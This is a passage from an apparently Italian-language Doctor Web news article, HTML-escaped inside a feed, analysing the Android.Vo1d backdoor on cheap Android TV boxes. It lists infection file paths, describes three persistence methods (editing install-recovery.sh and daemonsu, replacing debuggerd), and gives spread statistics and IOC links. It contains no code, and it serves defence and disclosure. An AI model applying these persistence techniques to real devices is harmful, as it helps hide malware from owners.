    &lt;tbody&gt;
      &lt;tr&gt;
        &lt;td&gt;R4&lt;/td&gt;
        &lt;td&gt;Android 7.1.2; R4 Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;TV BOX&lt;/td&gt;
        &lt;td&gt;Android 12.1; TV BOX Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;KJ-SMART4KVIP&lt;/td&gt;
        &lt;td&gt;Android 10.1; KJ-SMART4KVIP Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;In tutti i casi, i segni di infezione si sono rivelati simili, pertanto, verranno descritti sull'esempio di una delle prime richieste utente. Sul box TV interessato dal trojan sono stati modificati i seguenti oggetti:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Inoltre, nel suo file system sono apparsi 4 nuovi file:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/vo1d&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/wd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd_real&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I file &lt;span class="string"&gt;vo1d&lt;/span&gt; e &lt;span class="string"&gt;wd&lt;/span&gt; sono componenti del trojan da noi rilevato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
  Gli autori del trojan, probabilmente, hanno cercato di mascherare uno dei suoi componenti dal programma di sistema /system/bin/vold dandogli un nome simile "vo1d". Dal nome di questo file abbiamo denominato il programma malevolo. E per di più questa grafia assomiglia alla parola inglese "void" (tradotta come "il vuoto").
&lt;/blockquote&gt;

&lt;p&gt;Il file &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; è uno script che è presente sulla maggior parte dei dispositivi Android. Viene eseguito all'avvio del sistema operativo e contiene i dati per l'esecuzione automatica degli elementi in esso specificati. Se un programma malevolo ha i permessi di root e la possibilità di scrittura nella directory di sistema &lt;span class="string"&gt;/system&lt;/span&gt;, può guadagnare la persistenza sul dispositivo infetto aggiungendosi a questo script (o creandolo se non è presente nel sistema). &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; ha trascritto in esso l'esecuzione automatica di un componente &lt;span class="string"&gt;wd&lt;/span&gt;.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" alt="File install-recovery.sh alterato"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;File install-recovery.sh alterato&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Il file &lt;span class="string"&gt;daemonsu&lt;/span&gt; è presente su molti dispositivi Android rootati. Viene eseguito dal sistema al caricamento ed è responsabile della concessione dei privilegi di root all'utente. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; si è trascritto anche in questo file, anche avendo configurato l'esecuzione automatica del modulo &lt;span class="string"&gt;wd&lt;/span&gt;. &lt;/p&gt;

&lt;p&gt;Il file &lt;span class="string"&gt;debuggerd&lt;/span&gt; è un daemon che di solito viene utilizzato per la generazione di rapporti su errori. Ma all'infezione del box TV, questo file è stato sostituito con lo script che avvia il componente &lt;span class="string"&gt;wd&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Il file &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; nel caso considerato è una copia dello script con cui è stato sostituito il vero file &lt;span class="string"&gt;debuggerd&lt;/span&gt;. Gli specialisti Doctor Web ritengono che, secondo l'intenzione degli autori del trojan, l'originale &lt;span class="string"&gt;debuggerd&lt;/span&gt; debba essere spostato in &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; per mantenerne l'operatività. Tuttavia, poiché l'infezione, probabilmente, è avvenuta due volte, il trojan ha spostato il file già sostituito (cioè lo script). Come risultato, sul dispositivo si trovavano due script del trojan e nessun file reale del programma &lt;span class="string"&gt;debuggerd&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Allo stesso tempo, altri utenti che ci hanno contattati avevano sui loro dispositivi infetti una lista di file leggermente diversa:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt; (analogo del file &lt;span class="string"&gt;vo1d&lt;/span&gt; — &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.1&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.3&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd&lt;/span&gt; (analogo allo script sopra descritto);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd_real&lt;/span&gt; (file originale dell'utility &lt;span class="string"&gt;debuggerd&lt;/span&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; (script che assicura il caricamento degli oggetti in esso specificati).  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Lo studio di tutti questi file ha mostrato che per la persistenza nel sistema di Android.Vo1d i suoi creatori hanno utilizzato almeno tre metodi diversi — alterazione dei file &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; e &lt;span class="string"&gt;daemonsu&lt;/span&gt;, nonché la sostituzione del programma &lt;span class="string"&gt;debuggerd&lt;/span&gt;. Probabilmente contavano sulla presenza nel sistema infettato di almeno uno dei file di destinazione, in quanto la manipolazione anche di uno solo di essi avrebbe assicurato l'esecuzione automatica riuscita del trojan ai successivi riavvii del dispositivo.&lt;/p&gt;

&lt;p&gt;Le funzionalità principali di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; sono nascoste nei suoi componenti &lt;span class="string"&gt;vo1d&lt;/span&gt; (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.1&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;) e &lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.3&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;) che operano in abbinamento. Il modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.1&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt; è responsabile dell'avvio di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.3&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt; e ne controlla l'attività, riavviando il processo se necessario. Inoltre, su comando del server di controllo, è in grado di scaricare e lanciare file eseguibili. A sua volta, il modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.3&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt; installa sul dispositivo ed esegue un daemon codificato nel proprio corpo (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.5&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt;), il quale anche è capace di scaricare e lanciare file eseguibili. Oltre a ciò, monitora la comparsa di file APK di applicazioni nelle directory impostate e li installa.&lt;/p&gt;

&lt;p&gt;L'indagine condotta dagli analisti dei virus Doctor Web ha mostrato che il backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; ha infettato circa 1.300.000 dispositivi, e la geografia della sua diffusione ha abbracciato quasi 200 paesi. Il maggior numero di infezioni è stato rilevato in Brasile, Marocco, Pakistan, Arabia Saudita, Russia, Argentina, Ecuador, Tunisia, Malesia, Algeria e Indonesia.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" alt="Paesi con il maggior numero di dispositivi infetti rilevati" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Paesi con il maggior numero di dispositivi infetti rilevati&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Una possibile ragione per cui i malintenzionati che distribuiscono &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; hanno scelto come obiettivo proprio i box TV è che tali dispositivi spesso funzionano sulla base delle versioni Android obsolete, nelle quali non sono state coperte le vulnerabilità e per le quali non vengono più rilasciati gli aggiornamenti. Ad esempio, i modelli degli utenti che ci hanno contattati funzionano sulla base di Android 7.1, nonostante per alcuni di essi nella configurazione siano indicate versioni molto più nuove — Android 10 e Android 12. Purtroppo, questa non è una pratica rara quando i produttori di dispositivi economici utilizzano le vecchie versioni di SO e le fanno apparire per quelle più attuali per aumentarne l'attrattiva.&lt;/p&gt;

&lt;p&gt;Inoltre, gli utenti stessi potrebbero erroneamente percepire i box TV come dispositivi più sicuri rispetto agli smartphone. Per questo motivo, potrebbero essere meno propensi a installare un antivirus su di essi e rischiano di imbattersi in programmi malevoli scaricando applicazioni di terze parti o installando firmware non ufficiali.&lt;/p&gt;

&lt;p&gt;A questo momento la fonte di infezione dei set top box dal backdoor rimane sconosciuta. Uno dei possibili vettori potrebbe essere un attacco di un malware intermedio il quale sfrutta le vulnerabilità del sistema operativo per ottenere i privilegi di root. Un altro potrebbe essere l'uso delle versioni firmware non ufficiali con permessi di root.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space per dispositivi mobili rileva con successo tutte le varianti conosciute del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; e in presenza dei permessi di root esegue la cura dei gadget infetti.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Vo1d/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.1&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.3&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d.5&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item></channel></rss>
